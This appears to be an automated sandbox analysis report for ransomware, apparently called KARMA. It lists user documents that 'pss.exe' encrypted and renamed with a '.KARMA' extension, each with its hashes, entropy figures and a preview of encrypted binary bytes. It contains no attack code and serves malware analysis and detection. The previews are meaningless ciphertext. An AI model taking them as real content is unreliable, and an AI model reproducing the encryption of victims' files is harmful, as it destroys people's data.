Preview: ..N....!.cz..}.a..WU..b#.k.D.....\..4&..0P1Hxi.P.J...X.\W..m....KARMAn...x...Z....."u...,-|........e...4$...[J..4.{..TR...UzS5.s..V...\..G.:s.T:....5../.....4P..;.H!m...E.#..1....|...3......Ur0.P.s!........7.]..$y.......]`../............A.$.YJ.i.7.F"..!1.$....w.>'zkj)%.....F...^.....v..T.;hJN....o....z..L..q..M9R..>...i.@>.{:........$..I..f.0<.z`.gSNO>...vx....V.I.8.A..&...A.$\.....Q...c.v.PR_K.....u.e.U......x..w"......a...;.!..t.........]..=.......e...p..O.yq..J.../..JM.....I....06..'.A..3V.2.L..4B/X....1/..Q.3.U.........@..4H.x.....K].fQNA..P..K...#xd..kA.U.....wt.MRb....@8......NU.....>..9oy?5O..s.5..X..Rd,..iBh.q4.T.7.....q/...F/qjG..!..d8bR3.}G..P.......P.V..fvT.]5......\s..[..*....x.~..-%..Fhb....(.l...Zt:U396..u.....S....N.Xl..r...S.3P....\L<.......<.m./...G.Z.PD.~.hxp.a.t..p.w.?........#d...hd.`~.8..7.j!S.}V..0.s.j.A.N..F..i...@.e...x..i..T.N.a`..G(.A.....N..p2.w.k.....g|.=...[.Y..0...^....oe.80..@..r..
C:\Documents and Settings\user\Documents\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.821623393781539
Encrypted:false
SSDEEP:24:cHVYFhU+CxHyhujzJqNrag/mtQqAv/egG+Pi+6v16XH0:MYPc9xGu3tQXvmN+P16vEX0
MD5:A6425F6142861830938A2C4C6A92B844
SHA1:EFDD50CDB4F68B2362A13CED295DC9ECDEF800E6
SHA-256:168ED0CAF40C937FBDE6119C687DAEE0C67650DCAEFDF8751E34AE20FED2438F
SHA-512:C2DA7EB5526FBA0BDAB989CFA354B5E78D7DF79AE6A4A6FBB5E7BD7117CDFC8AA47C2C67AF08A8E2A1D00B1505CEAB84CEDB6741AE4EC1AC190C1E191CB5BBF4
Malicious:false
Preview: ........Y.N..r.kK...Z......(.b...P..esa./j...d>..?..(G:...KARMA2..k..............V/i.W?.4..au.. .0 05g\v*...Y.X.{\C|LO...7_..&i6....4k*....7.....%.P..?j.yua.l...... +...W.......88!$....0..H.mP<.....8..wM.\..'-.[.~E..S.hO.>IR..fZH]8V....`....qh.[.qIb...F..\.O8....Bf%.%+g".o.a. .? ...P2...]~+..1.Ll~..g...dj..<..._85....:\.#.......CE....JU.%M.Fq7.p.Q?...$............b.j~.\..B.I..8.B....g......Gz\...qO5G.8..M}F...F....w].J......1.X..Mm.%N.K....#j.m...C(..S.`....TJ2.,>{.[._`....1Ix.n..4.y.ez.......+......#W8....fr.>.`!....F.k...6.TTz..-.T=/Y..h.G....D3.dz).......n..X.8..,L.V.Fh......,.P.d.nh)..?^...2?I.|...D.@........w.j.....j...f.n..F.;.Tp......Y.J.b.....l.............t..........AQ!..e_..z.?..*}`.86..?..!O........!^...A..b.b.....4..{.<.....(.R..=.a...h.1Q..Z.f.+..vJH.$.....Mf.q.]4y*....e....i.vGk.F.C."....G.}.y..h..".R........@[.~-.R..=4...x.r..`da.zO.....p..};..qzOn;.<J.`s.6.........VOe..D....L..d.......u.O.vJ..L...R_.$..u......Kn.Y.....,
C:\Documents and Settings\user\Documents\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813433140922798
Encrypted:false
SSDEEP:24:i0X5ukQMG20ZKiCYZNm5Ndu2vUcXYe/GWz/ue8S6cHCL3NJHxUz2:i85ukQ520EiCYL6NdhvNXYe+C8JDL7k2
MD5:16FF8916B02FD627F9B3A89C56C0BF1D
SHA1:4F5D7B9ECE2E5FA9512719BAEA682398C5CC6FA3
SHA-256:79DA0A48E5F096F17A046E5A3D034FD49E7A23D88FEFE2CE48068AF5E424247B
SHA-512:25F084E21E6E61555FCD2F318E472F22F47966BBE4F222287E612F0E57D81CFA97CD077B6ACCC2A02246766AB9122E1177DA387BF804569444CB268D447872B0
Malicious:false
Preview: .C.N&...L.b..i9-x)...9..h.B......;...c`..B.rUqm...6.n...~....KARMAY.t.%*.*.._.a.r...9..c,..m|...%.J...G.G...7......n.0B.AQ..0.. ...S...A...........[........k/.RmA..D&Q.[...-.<.......;.s. ._q.......jKE'. &v./...&J=......5..r.,I"..)..sH.....K..N]..m.nS&L..o.0..!k_{..z...t...{.g.n.e6.K..+Y.9.....%..vCh...1N..w.w.7..._BX..LEh...V.+.h..cI+i./..Uh(c*b.....<.y.'.r..c_...I..^.".zN.Q.......N<......4u.....#;.8.5g.Hc}....L.....J|$..j.u.f....&..Ly(..^.A\z..R..+..;.e.J....?.f......n...k.4...........Z0.8..)..|....l.?...}..tY.M.....GSvr..a.......9.........r4.W.S...(.Eq..].;.2.).-....{{.....@.//.?........sj%^..sY..\.3?.......7.N.NS.w.w.....zt^\D.....B.$.\.k8~..o...2......~......!L.=.]....,X...1.g..>..V.?y_...6.w(\.*F.7..pS.).....c.AN..f..n..2M......%/.....4.".i..t.._hQ..+.-p/.Wq....K.] 4....*Q...P......z+.#.]m...q..-.e,`fL..w...........nF......Qs....Y..".i.#}b.j........0x'}.v..C+.Q....-#<.u..uq6.r`N...=..0...N.h.#.o...,..B..|pM..u......g.$...+..@$..D..1y.g....
C:\Documents and Settings\user\Documents\PWCCAWLGRE\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820970459397875
Encrypted:false
SSDEEP:24:2qS57xDTgglL0PQIsIEaS5M6XmYbsT3PcaGdMl2KzNCop:2qS5d5lg4+SrmYk37IKzLp
MD5:5F171F92B914A2E802066A9B93F1CB75
SHA1:629566999EB9A2C9B503E8A6E48B0E564B5E3476
SHA-256:C821AC0B8F484969F9AFA1E1E3B6A99E37B94E870A90B42CE671B082079EC6C0
SHA-512:0C223B9ACD15AEC20E01D054C439B459F622BC83302A3CC13544CAF421B317B95C2D2E73480B10E7ED789A3331573FD8C3140586B131D8B4FD6FDB8BCD928C2D
Malicious:false
Preview: :....}.../)...;.7...?-.6..7p.......Y.%B....xN9.....&U....qU.....KARMA.5.c...O......*o.p.)g....a...|.*.."...t..M.|...|ez{...33.X.c.......]...e.r..Y....p.h........-.|'..Y.=.(......{........N..%.|.@....'`....wk.}[....{T.=..k....Y_(C.Z.........{..~=.I.]2....q.|a...Q...P.ZlH..._.o.+./A|...R.....Z.e...Q...4.*.0[E.....p....F!.<.5\r.Q.?.AC.....$.UY.q.O..0..e..x.u-$a..A#.W;L.Rp.......;>.G]..d.....X3.&..E.`L)_..x.rOL..Jo....{...}.t.sf!....G.Z.\....1..TDf.j.9.2I.@..d.r..5........C..9VT.V...'...;......d......j......eWNS.t....o.......M.qN...a1..Q.GH..$...yG.=~\.3K.`JD.Y....{..l.."k4.`u....+.....X.M !..Q....#I.....c.BNx.....u...,*.|#Z..D....UC8.x?..?h..... ..YX....Ph......(U...5..Q....w.p...Rg.W...8.W.......3A.YlF]U.G-xI.y16..P...R..A...k#$..I.......%0?.9.HD}..,_.;. ..w.cb...}wG..%:.r... =<..f...9`......?.....U..UM...w.~..J......w+.v...Q(E.bj.....(.F.jF...3...cc.hE..n.;G..)G.Kw.;&...$f.=@..UL.......s../..+7u.r.D...R.......#.....n5....4d/r[.|.!.....M6...,o]....u..E
C:\Documents and Settings\user\Documents\PWCCAWLGRE\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799303533827198
Encrypted:false
SSDEEP:24:S9iA3P21Zu/qjqGYdf8dnOQBbQDGndXhQ4j2JDoUPxSWmHD9IXKyT8h2ySNG:giSP21k8qGYSlOEBndXhihUz9w/k
MD5:AF59E7F2DEE2BD06AD09E713322F0CF4
SHA1:9FA5739F66FBF8074EFACE1322DD527812155BFE
SHA-256:319338BA687FBC5390E3420D405C712E4551204A036319E038A7ED3826C84730
SHA-512:1C21A4EA6A5091BD0878CBF09DE2E072910A697720A2315F75F714CEA0845C2F8914E97FAF34FEE017C4804AC7FF3E40B4BB421D27FDDF2C59CB5774DA922A1C
Malicious:false
Preview: .JFIz#O.Y...........Y...HG.......}.A..RX,os.hP.....&.m.b.......KARMA_.6..WV<g.i..../^........4....aJs.......1....o..T.N.ch..f.;.N.[7+W~.....o.Z....d..|...sN.e7g.G.V.b.d3....s.t.f..",/..E...^......l1v...9...xD......O.......a......Q....v..fp.f.8p..U.....g...>...p...,.....:.(...........A.4..0:N.Q..>OR...........'....X..q..<..@&....v.E..L..KZH.p:.Jj.j.A....a.yv.....p-..g>.. ......l....1.).6Qn.J^......f.fo..`I2..6.%..s......,.:.....j...S.. ..~_../.[}..."..P.......|.2r.7aB`.b"PA.l..r...rz.o....Y&0 .....Yh#5...;......I:..$m'..(...1:.c4.d.u.,...^)Z......7......N..s.....{L....JN...=e5..@.....#.MDy.+..V.*..k..<%..q|=D...u....w....+..=\..}.f....G.W...4.{....4...7.8..........&.....4NJ..".s[.+...B....*.v..... .wL.Hr.V...H..)ab..v.r...|7..^7v...wE..T...3..h...5....k.4......W?.i.....W.!...,.X,c..Sq.V......Y\...a?(.?...P..Q0.B.+7.._...*......s....j#|u.d..c.6_.8...7.f...?I.5...?AMC..........S.bN9.....lp..Q.HM#.V.D.M...6.h..A.)..2.......0.iV...gF....
C:\Documents and Settings\user\Documents\PWCCAWLGRE\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819475330846343
Encrypted:false
SSDEEP:24:EKdvldpBjWvGfaL3tKeIl0Ae/6/dc03rtJ8O0Y5QOYhi7z7W1MWI8P:EKVld7oL3tRIleedBvEYyhE61MkP
MD5:F6C0E01228079BFF452EC6D83078F22C
SHA1:04829FF3E86E0E743787C0DEF2A005CCA366E165
SHA-256:A4A2D4DAF156AE603505F967CC57F012C2678668919A9A3C6B4D1796CB8A63E3
SHA-512:66DFB259E2BF07833DE1A8CD0A9685462340708B63CF4F3EADCD045DC2F2765081B63F26510B571CD57E4270CC5E933025BFB43B8911BE4D683C052E890E2516
Malicious:false
Preview: .k..!3..K..h........LU05.....m9a?^.?.l.Q......-..G...*l....KARMA.}.j.H.,..g,...w>.i............`..D.'.....&i.Y..H?.!n-.lk..H.H....B,....}C....7.MDi..*f=l..Yt .D..e....^.7P0.1..h.T4..N.....,.0........?h9.3....3p...J.no..Z.l.B..Z.})Z+.......)..1.(x.[0ct.....CU*.h..48>V%..Z..3b......7am.....l.~V..N- .6.9......G f.X!.I>..........:......w\....z.jww-.......\.WP..P.R.5..y.v..F....".3.U....D...'M..TJ..aU.hZ...V..^p{(......zOQ...V......Q.D..c.8...kW.>.?..u}....C3.$.c.dW..B..l...jU...S........eK\...t...]DS... cxs...Dmc..{...'..79Pi.)....O..F.)........H....@..G..+.8y..[....<o..+....j..7....G....)....B4.C...4.....V.Q!...V.r~.s..a.r....{..8wD.2..?.-...NU...&.g...E...........;...O...."s...3.;.\...-..Q..gv.DR.8{Aq#.>..W...n{`.L...Cl...{.uG...r.?....wz..._...*.o........>..7..]..!S.1...tHA...$.Y..C9...9a..;........^.G..3....#h.dy1,...9xG.mAcQ..s?\X..............U...q.Eg..$.......*.W..3.)....`...7.......'..ggH.Y+....%.[_..l.....@.A.)..R.kdx_..!...F.k.q.w
C:\Documents and Settings\user\Documents\PWCCAWLGRE\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:SysEx File -
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829261338930429
Encrypted:false
SSDEEP:24:EFeGIZSVHFs8/uoiANXHiLYs9mGhE25B+BdHxgqke:BpZoHFsuJZHixtE252Fx5
MD5:90D99CC4381BD791F3767E62C1EFFB83
SHA1:5E67878F98DC50A589B8E47799591BAF02A6F97B
SHA-256:78F679301DED96134EA295DB49FA5A96C1AD8CE7C66EDFC3542523F4DC7E31BB
SHA-512:DD2AF44C1FA7A3B48DEF9FEF2EE41387534EE1A37D79D59E7BE63675AA40FD56C80C65C5ACA82D1B1DF5393214CD5B75F96935C7EF14BA0704C9E2D9B6AF90D6
Malicious:false
Preview: .S.....}?x`.."....rrY...........+P...bR...8...P..se.nK.Z.....KARMA..rI..@....HQ...G]6(...E.9.\...g......L90........M.w......g.VT...%.....K9..nzn%.Y....<.H..!0.t..t)R&..xc....W3.....pj.....z...tq.....E-..VTzv..V.J.iY...d&?..N.5\. @...5.....i.R.Q<.........Z.s..".Z.p.C.....?a.....x$L...Z..Q..V...E.f.#.u.E.5x.....b[..<..D..?.i..p.Hd....Y#.]...2.9O..$b'...V..j....Hh\g.%.yOe.M..*o...,Q.~....S9K..?.L.,CJn..,u.e.d.R.N.]:V..W..(..o..P&,[..JL7`.}.wg=.(v.h....3='"uw.<..uG.....`h.u:.USt......}C..k.L(...n.-bo....fl,..D....\<.. W../.O..e.E.......6....^..-M..8KL.........B..'........T.D..<.....z..zX.......=.<'F..]Bb.....N..*.PLo8...L..&..q................v.-..:.^...Qm.l.7?.w.d..DP..,V.-=.`=..mh..C_....e./.y. ..k..yg..I...3.{.6.n.2`m."..N.._.).....1|.....D...X....JWy9.r..'6:.G.DXH.+...,4.T.......5fHg.[.\."L..-D.....(..Kv_.~.qd.......^....>Q..=.K.Y.G.5..*g.h.^...4.{=+v.W.......xu)GQI......w.K.e..8.k.....:...'a.!....f..].....$....h......V|... .
C:\Documents and Settings\user\Documents\PWCCAWLGRE\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832926575046884
Encrypted:false
SSDEEP:24:0D1We6saxT74JKdNTQyxdeANNAMp5+MrOlTPZmZpE1:0Dr234cdNcyvpNJp5IEq1
MD5:36066FA0F0E80B052B6C0786F796DF1D
SHA1:9EC21A4DBAED440B417BE16F092E98B8F3D13EAB
SHA-256:95F66BCC4DA928D3DE88C597E7DFF4BD172938A42798E8294A7E067F8FC1C3E6
SHA-512:79DFE47E3C56A84F835E5E35D2BE7E8B00DDD466EEE3A32129CA615C51BE91464E3AEFA4FD9D6BEB29E462936220AA416316BB8DDB27D08A69E2C17E25EFFBB5
Malicious:false
Preview: ...x>@.+G.@x?...a.....v...._...~.....Iz..h..H...dN..a.. .....KARMADR.T...B.....g...w...IE..\..&./^~.`>>.~.^}.zq......H....t..>...X.t.f.|.0..g_...K.o.xN.#[.......qF....A..= P..(#.v.........ym..Y.........%{L...i.z4j..].GSJ..S..P.'.EwK...E!.z.l..,.,.....G0."V4@....`r...&Eq.J?T......~e?.....&|W..U..o`..3_..\..nh^Y~.e......E..w"...r.4.Q.W....nT......,.uO....l..'..h...T.....8.QK..#.PWh.[j....X..........H.d|?4;.C........a...l....r:.S.(.z.;f..r('.l.d.Y...=W.......y.g..iV.G&p.L..!3.....N.D`.B.,...3..Y|...Ck.X.?..<'....mh?..jp..<.e.iW.A1.|.>aY.R... .T...I'..}../e..{S..mW..g.* k,.M.J..n=..q..jw.x%....k.,!.V..._..j...)gm..C*v.%.\w.....,.|`.....`..%q.T...n.e%....s.p..8/..p.h.i6v0.\.b?U...5.7..;.Q..,.b/. e.iJ.5<..v.E.#..m.F{.`..? .i.F3.K......Tk.)h.~....uw+X..2M.0<I........`x....Pz....=..]...Y.[..9.........].K*..Lb..0.".w.a. ..6..~...>L...6.....j..o...J.....].T.?.....c..0.......2.[wk..f....~,&l...Cox.Z.Nu..1.-........2..d.....j.s.!..I.}..>.
C:\Documents and Settings\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.831178858085952
Encrypted:false
SSDEEP:24:VqKVF+s0qx9t83zXJPld4oXGLCVo0W/cmS358fvYfGlyZwZLc5CiYzlgu/bn:Tn+sTNwJPldZWLmoB/u3Y6ZKLc5AzZ/b
MD5:1B83785D0110985EF3255F8AF5D91971
SHA1:2A63683D4AA74F3707138C1FA15E09710D12537E
SHA-256:2FFB586923EBBFE881FEDB71290F41926B06CD53C0A4ED89146A8EDC3EB136E1
SHA-512:195871144227E83E55C101127AA5A0A45CB64CD132C0BE2D580A0D0603997EE589929A4286BA200EEFA2CB82E28F4856BD552457B3F72A08EC7C2BFD4AE9DA73
Malicious:false
Preview: .,&..\..Y....H:.3....1N...VG.......v...;m<...vo.,....5.X..=...KARMAs...e.$...v@S...*....q....L.`...c3..$.X)h........:....n...h.G\..y.p....._..5..r.%.>......(2..$0L..,l.!.d.2l".-.^...G...h._w...M@....w..{dt.....}.K..n...W.."\'.S....z....Zn.......$..r./..\.l..v..B...U...r...-P..1....y.@....&...#'.g`.a....e....j...8~...73.(...^X.;.......<..P4.a.x....\...H&....)..9.O.L..'p.7...k.~..z.....i...x........{L...N..I..Z .jS..+.....:#....8.w.v.w..#...4...Zf...]....~Z?.).. .]...ujbX.......A)........cp.uBK..D............L.Vk...3$M.....9.0..X*Rs.....p..~./n....|..b.`p.9.F._ms..V..g...E.|w......d....]..q.....,...C....~L...|.AJ;..3f.j.uQ..H.Fp(!..S..}...../...&..i..'.5..SQ...j.......c.....=.`.M..MMH.c....\.`..J.......Q..d.|...P..Lo.,X......>....N......t..;|...s/....W.?{&2....Sw......E.A.a.xVl...D.dM. X..n..t..A........h.Mc,..~...M.V..~........S]5?.[.].I".*b.]..q.(kT..w...o7ea....n.......).R.S.ca....V!..v.,.....Rd`.b/..i....C"."$.._...X...m.........e@..x.~.G,
C:\Documents and Settings\user\Documents\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805470265535074
Encrypted:false
SSDEEP:24:2nAkoajxIBIXuj1jO/K9qj+InTxrFGwDzSLzojb:bko2IBsuj5GKEyInTxrM+eLk3
MD5:1A52FFB1867EB6FD59C4C5A1221F896C
SHA1:04B566CC709396274AC78EAC69CC8A788511BF2B
SHA-256:15251A5BFA96230982627E6364337A65A86C92F254157BED58C9B54A2EBC0219
SHA-512:FA9098BA551BD05102813CC861F5113BF9C590B1E404E447F9A86696A202C25ED72210E973EEBE57189FA67DBDC926B954FD69D77A19C9513E1FF6053D1156A9
Malicious:false
Preview: PW..........U.*22|..Z..."2hg...XIiOR.z....s.J..q..07..5....KARMA....Sm.b.w[....!..c>8..A.j.$S.......%t.V.c.@ds.....x.e+..a.[.b.z.EHC]tG4_2. .FE.......@x...%...<..|..y{w.[.....]...{TN......%N..bv...b.=..w...).K..<.`..5.|......7.U..e..Z.a.0q.>u.....6..\?.k.k..>.......^.DP.Y.1.<Fj.3..Q..pb..$.A.......[.HJ..;..E..a..8.X......s.^.x9.E.7....X...H...2cf...q.[...{.y..v..x`)z^.x....q..A..0.[.....9+.0..2.Ay!.!+.B.zV"0.0.c....$b.1.w...i....~..N..a..HJ.>!NN@.~.:5....Aw.m0.O.......K......O......v..a../p...O.$..2..{#.qEC...G:..>.7...{..9.D2r9..7Kw\T..M[[....R.....:.b.....:+.... y..b.h....9P..1avqm.6..7..[....F.....7#.....Y.y.G......Q..=L8fB$....KA.*..}..A...n5.U.H........s.....8.UC:=Q./a.... .W....g..]._._'.yg}..H.y....(..'.Bk.L.9....T3..u...hj.a.f...\.F".N.l.I..W...hCLr......S<.._DVC.}..._.y.\.H)....\..z.n.ny..z...vqt3.....++XN.9v.m.o~......Y.....q.Q^......&g.....<..Gv.C..\Z.z..........=.....CA...7..m._R.O.E.....jR..S....8n......79...<&.{.D.#...i.@.
C:\Documents and Settings\user\Documents\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832398142121143
Encrypted:false
SSDEEP:24:HUSRuafDjFi57jl1/vr9QS0u67Lz4X1Man++oMR3s5e:ZoQFiRr9QHuMLz4XmandoMNs5e
MD5:32045E297491334EBA3A26015CB6177C
SHA1:9E8DA3E17CE522A3790539B6CBB13B55262F83B1
SHA-256:2B202D9EAAE6F48C3761B44E2579C39783805DCD4E102425DB67996EC451751E
SHA-512:578565A173B6E878087F01CE369BC1096821C537248F152E54DDE28DA1EB2D96B5DC6D0F6EA891A59504014206C6076EC70505F75702A4CC3DD87925A9AD4219
Malicious:false
Preview: V{c.k........I2.'f.y..i......i.@...U...1...{|..{.....w....KARMA....5......Jp.^C.!O....? O...y...vG.]EJL..Y.LQsp.p/Z.l.(%..b9&0.Q.y.t.`.......T.~x|.|.%.X..NWlXUF..p....#..C..o@.\...0.......=.:..ar]h...P..f...^./...!>8.:..P..-Y...Ok...(.r..~..O.C.B..d.9l.1..K.......e..C...>.....%.5?4.d..~A...g...:9.].....^`Bl;...^a..^O.Q.6.7.T.0Q.....(....:..W.xF..:CU.M.I.<...d..c..[B.bHn.u........lr&.....1O....H.L.=.f..?60.P.A0....*...R....c.eK9U...F`.WS.$..Pm)m..%......b..7..=V=..J.....zj=I...j.^.T....K.BY...1.h.,E..".P..R...n..E.o...sFv......p.Ga......&.6..yy.z........n&.F...M'...lG.@R._..7">..#8.i..r....%....H$o......5~.`5.......+`.;_...r&..*V.X...ch.#B5M^...3io. .wV....`..u......../.qi....H;A,.h.%8.....V....+...i.:F.-.@1.......T.F.&.}..]o...k:...d:..OEfP..^..6BW.0.H..n....gvD.x...p.......d[..,2L.J.r)_b>...J...KGF..,...S.&^.!K....1..Dy.@.+...-.L....?J2w.......(.WLv..l..R..../..Y...[..&.l..,<.........,/...q....h{..\y...C.>G......"......c..gk.50..W......a9o.F
C:\Documents and Settings\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81402376433519
Encrypted:false
SSDEEP:24:9UG0dB5xsUzMGue0tLbZ+tkTolhJufI8lJEPXH4ZfnUUume:6psUhuaZq3l2PoZfRuz
MD5:153EB54EDA810F7D63B11D4F32BD454B
SHA1:436601AE3EC55571523BFC5C2AC85227B6D17D1F
SHA-256:9919F13CF3D10D8B417E57FD94ADAD142878D21BB166EF0C160FB03607C94F99
SHA-512:C453EEE9F93471F8C9A51E10E0C5855C7EC55712A3C3C31A6E9EF56B00851ADE9A85595DC0CFB4D7FB93482200073D64F0B12DE1DB103316C72F239E72F065EB
Malicious:false
Preview: 9+v.7...4...s...E.q...8........M.X..!e.R...3.M.V"...`...fxM....KARMA.XXF.}.J.......0v..WF!.Qn6N,....m\....a....7;.d=....h..Q[z.g.Z......M..wi%y.. ..Yx......t.a...eo..-".s.[B.......M/E..W_.'.....3...^4._..%..1lmQL.U.9L.m..|.S.i...."..<.C.a.......H.1.tss...]..'...(.!5....L0.q..?.q.-......G..G....j...@....m.w..T......\.BN.TBL_..g.'.q..r;.....t...+.9...K..../3..{.........u.Q.s...%..)13..#d.4....p..Xr7../#....h.L.?..7.t+go.. _*.a~.Z..q.(..4!.4Z.~.?x...K./....@....`....t..H|2&(@*p.....X...[.....J.4.OUii.v...wk.....0.q.0.,.d.....$......:.c.......zT.[o.....udD.0*.H.KZo<K........%...o...G....aX.s(.c...d...'.....Q.$..v.O.......(.6...v...../..v6..~..7a..../..G2.......{..p.s.^.9.#.....G!...B}.....X..^.6(...>{r.+K.#.Z..L..W..D..h!@h. .$o.UA......< =.......ci.Y.A&.`.]..xU.Q.[.8.l..U.e.C"C.n3....+Z..W...te.-.K.P..n....R.....V/."....p.+.<^S....1...!6i.v..|..N.!%...)m......).f...j..>.."p....(..s......\........-.....Bq.L..._.C;'..7........G..rS...d03.*M..m
C:\Documents and Settings\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.842261373481898
Encrypted:false
SSDEEP:24:eAHlMQWIlCYl8M8sXpt93hJ/0IAGYGMUiECFkAKrHMTq8n:3PlC1MbXVlAsJCFkAKj98n
MD5:001592E42ADB61465F32D10B6CFCDB1C
SHA1:41B2A9E9339D13B14D2FFF0FC7D12B50711049C1
SHA-256:CF38E67D109C1A1F8576411853D803BE6D901170ED34990171581DE95C0725A3
SHA-512:65B812A42680924071C5009C989CA37CE9DCD7576944834B759949F684F116BD6A315964F8A360F5AF8F33A7D92DFD06BDED5BA59C399AB3BCBB83A2FF0FE6FE
Malicious:false
Preview: .../V..N..@..KY.&m......O.......S.......k..bQ.......4.3....KARMA.hHc.....S...U.u5....X\..$MQ*.A..>........h..a.K.=.f.P....A...;..u...SA.v..6...'6.Y?O....Wg.Q.....UV..P...;.........!N...5.e.x.J3...k-~.,..KP2<..p...dA|..p0*..7.=.G..rb...n/..D.._..$o.. .Q..{.>.D..N.~8\.O..'......q..K.7..G.>.o..t.nX.......Wm.+.t^z.:..x.+)? .e......._.I.W9a...,UI..Y...S.%.+..}e6....].Z.|.:>..yn.DzTJ3...g..2....:.^}$y.+.gQ.")T...CSQ.....9T.T...s...-.!..y..n.p...l.|...`u...w.....dI..!m.ubM.wS[........Z}.:......._...M...<...u......9j..\..#'....8+.........[O".?.dq2..B..e.8].n....e2Ta.fx.A....o..Z.....9.1.....`...wY......1'.`.....h.(...3,..........r.>A.+..o..&.P.:.7=....!O.X.)......Zx..lb"..8..YL/...k"...o..).w..H..i.~%...W...g.d.[.=..W.O.,...FP.W.J.z(I.z.a...9.0I...".v.#G.....{...(=.e..%F..a..GY....K..64.Wl.Mm./.4.R....95.3.....i.....l.x...8o.k%:`..<.....y.R...E.....g...j......%B(..e....ao>R..Mf....qlO..+Q..r.P..|GhJ..eLC.8...V@~a...r..H...s.....
C:\Documents and Settings\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82993784832169
Encrypted:false
SSDEEP:24:xWM4krPh4C46p5U9OkNvzkY8mwwyOZHI703klKy3h8aq0kcZ:akrPCC4E5mjewyO5E03ty3Ca7
MD5:6EAD7B398B20B715ED574366BB1C02EB
SHA1:96036A212C321C1BB3B4E7ACE3FC6C0B83BD254E
SHA-256:55F6CE6749B9F615C1E05A20D8126E546524B127FF01E897A13B857EA71321D0
SHA-512:C54D1191D75450F6568801CB35CC2327543ACF0A127B3CC3CCFE83501EB14D89D0D6D6CBBC422F444C0FDE90A378FAA4203FAD295F9FA96A74FBB04D3870D553
Malicious:false
Preview: .-=1...Q...;.T%.>I....E.w..T.........%.>'G[...o.m61.....>..$....KARMA.i.]....#.x..k...;.....i.......`..c...Q..w...@.B.u/N\.z......s.Kl3z....S._*.6..y.<..^....e.<g.a ..... ........".'d.......w.LzD....!.7..{.....R^G.s.U.+..%pW....z.A.@...>.!..c.i6....~5vQd.d\...9Rc6}NLe..Ri.H.._..V.8.a.....x.I..b.*.B.]..&.F.@.p...t..>_...C..h^.x.e......c5.._y...cP..^.$.......-.O...)..[...-."...v.1.Bf..F/...EV)K.0..p.H(.x.{..&=..}.E.q.;...>..".~4..#..E.....H......1.}.X.'.x'u.V.......@Q...I..G;.d....;....l......^....x@.......35..3q..b.#..........X.<..<$.y...?B.3&z.\.A.S.)..;-.."..w.+J.._*....5.I..s..#...*(j..Y.c<.)b...AXC.U....CH=O.gzc..g.Q9.(.._N.......U...U....d2"...[h~...r@._.rS.....h..r.x.0.."......L..>..I3...Q.eK..h..W.|.@..0.":!4zU.HI.v.{-...c0S9....3..q-..9}...a....8..x.x...pF..W....Y..g.p.nv...L...DBG6D(....`..E!S#f......#...N.P.)kh"x..>J|.%...k'....IB.._6c.T.a.....O.)s../.V.G.......7V..Ad6...@.W.l..KI..#4...=...X...:.j.f........l.<ys...}..Q...&.....x
C:\Documents and Settings\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.833223265709336
Encrypted:false
SSDEEP:24:Tbf/osnpQdA4PL5pHDW9995pIXnqDoPOFZDjkDRC7V:XJ+dDPjK995pIfcDjIRyV
MD5:99E239A91FFC04A939EE701ACD00F5E1
SHA1:6CB6674B82A2C40BA93C906CFF302BD23F18E98F
SHA-256:399D276B99BFD9461A205BBD91935D2AA8E01F2E878A7E77F16C4EE2840A0220
SHA-512:C056240608BFF5056C5B5FFD81C37DFBD05BD6525483E174239D244CF8F435322874873254C1F9F7F8B1EB4B677EBC3F5B9B09B7BCB505E3780F5C497F256E8F
Malicious:false
